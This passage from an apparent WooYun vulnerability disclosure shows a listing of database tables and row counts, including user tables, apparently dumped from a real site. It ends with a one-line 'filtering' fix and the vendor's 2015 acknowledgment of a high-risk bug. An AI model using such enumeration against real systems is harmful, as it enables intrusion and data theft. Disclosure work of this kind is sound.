| tbl_e1_url_class | 2 |
| tbl_e2_announce_class | 2 |
| tbl_e3_course_announce | 2 |
| tbl_e3_url_class | 2 |
| tbl_e4_1_meeting | 2 |
| tbl_e4_1_price | 2 |
| tbl_e5_course_training | 2 |
| tbl_e5_url | 2 |
| tbl_e5_url_class | 2 |
| tbl_e6_announce_eng | 2 |
| tbl_e6_proj4_class | 2 |
| tbl_e7_member | 2 |
| tbl_e7_service_ann_class | 2 |
| tbl_excel_announce_class2 | 2 |
| tbl_excel_down_class | 2 |
| tbl_excel_down_class_102 | 2 |
| tbl_features | 2 |
| tbl_law_category | 2 |
| wp_users | 2 |
| tbl_a11_1_workflow_class | 1 |
| tbl_a11_2_intro | 1 |
| tbl_a11_2_schedule | 1 |
| tbl_a11_meeting | 1 |
| tbl_a12_alumniasso_url_class | 1 |
| tbl_a12_announce_class | 1 |
| tbl_a12_stmd_row | 1 |
| tbl_a14_3_event_class | 1 |
| tbl_a3_1_down_class | 1 |
| tbl_a3_active | 1 |
| tbl_a3_celebrate | 1 |
| tbl_a3_eacademic | 1 |
| tbl_a3_evaluate_url_class | 1 |
| tbl_a3_geea_member | 1 |
| tbl_a3_geea_process | 1 |
| tbl_a3_url_class | 1 |
| tbl_a5_statdown | 1 |
| tbl_a6_2_perform | 1 |
| tbl_a6_2_stat | 1 |
| tbl_a6_2_sysintro | 1 |
| tbl_a6_url_class | 1 |
| tbl_a7_1_is_open_date | 1 |
| tbl_a7_3_is_user_list | 1 |
| tbl_a7_3_public_publication | 1 |
| tbl_a7_3_recruit_class_t10 | 1 |
| tbl_a7_3_recruit_class_t20 | 1 |
| tbl_a7_3_recruit_class_t2_qna | 1 |
| tbl_a7_3_recruit_class_t6 | 1 |
| tbl_a7_3_recruit_class_t7 | 1 |
| tbl_a7_3_recruit_t20 | 1 |
| tbl_a7_3_recruit_t2_qna | 1 |
| tbl_a7_3_recruit_t6 | 1 |
| tbl_a7_3_recruit_t8 | 1 |
| tbl_a7_4_consult | 1 |
| tbl_a7_download | 1 |
| tbl_a7_download_class | 1 |
| tbl_a7_trsfstud_config | 1 |
| tbl_a8_2_page_banner | 1 |
| tbl_a8_3_award1_2 | 1 |
| tbl_a8_3_award_1 | 1 |
| tbl_a8_3_stdbus_detail | 1 |
| tbl_a8_4_calendar | 1 |
| tbl_a8_4_calendar_class | 1 |
| tbl_a8_4_download_class | 1 |
| tbl_a8_4_e_news | 1 |
| tbl_a8_4_epaper_class | 1 |
| tbl_a8_4_excel_result | 1 |
| tbl_a8_5_clinic | 1 |
| tbl_a8_6_scholarship_announce | 1 |
| tbl_a8_7_consultant_1 | 1 |
| tbl_a8_7_schedule | 1 |
| tbl_a8_9_announce_engerneer | 1 |
| tbl_a9_2_buyer | 1 |
| tbl_a9_3_secondhand | 1 |
| tbl_a9_5_file_down_class | 1 |
| tbl_a9_5_file_down_class_2 | 1 |
| tbl_a9_5_file_down_class_3 | 1 |
| tbl_a9_7_edu_class | 1 |
| tbl_a9_8_purchase_about | 1 |
| tbl_a9_8_purchase_announce | 1 |
| tbl_a9_8_purchase_faq | 1 |
| tbl_a9_8_purchase_faq_class | 1 |
| tbl_a9_8_purchase_tender2 | 1 |
| tbl_a9_8_purchase_url_class | 1 |
| tbl_a9_9_announce | 1 |
| tbl_cpsh_announce | 1 |
| tbl_cpsh_down | 1 |
| tbl_cpsh_down_class | 1 |
| tbl_cpsh_url_class | 1 |
| tbl_e2_common_course_intro | 1 |
| tbl_e2_course_intro | 1 |
| tbl_e2_credit | 1 |
| tbl_e3_course_actphoto | 1 |
| tbl_e3_course_map | 1 |
| tbl_e3_course_plan | 1 |
| tbl_e4_url | 1 |
| tbl_e4_url_class | 1 |
| tbl_e5_course_down | 1 |
| tbl_e6_history_class | 1 |
| tbl_e6_proj3_class | 1 |
| tbl_e6_proj5_class | 1 |
| tbl_e6_proj6 | 1 |
| tbl_e6_proj6_class | 1 |
| tbl_e6_url_class | 1 |
| tbl_e6_url_class_eng | 1 |
| tbl_e7_edu1 | 1 |
| tbl_e7_edu1_class | 1 |
| tbl_e7_edu2 | 1 |
| tbl_e7_edu2_class | 1 |
| tbl_e7_edu3 | 1 |
| tbl_e7_edu3_class | 1 |
| tbl_enews_style | 1 |
| tbl_epaper_at_mail | 1 |
| tbl_excel_rss | 1 |
| wp_links | 1 |
+------------------------------------+---------+


修复方案:

过滤。。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-11-27 23:42

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价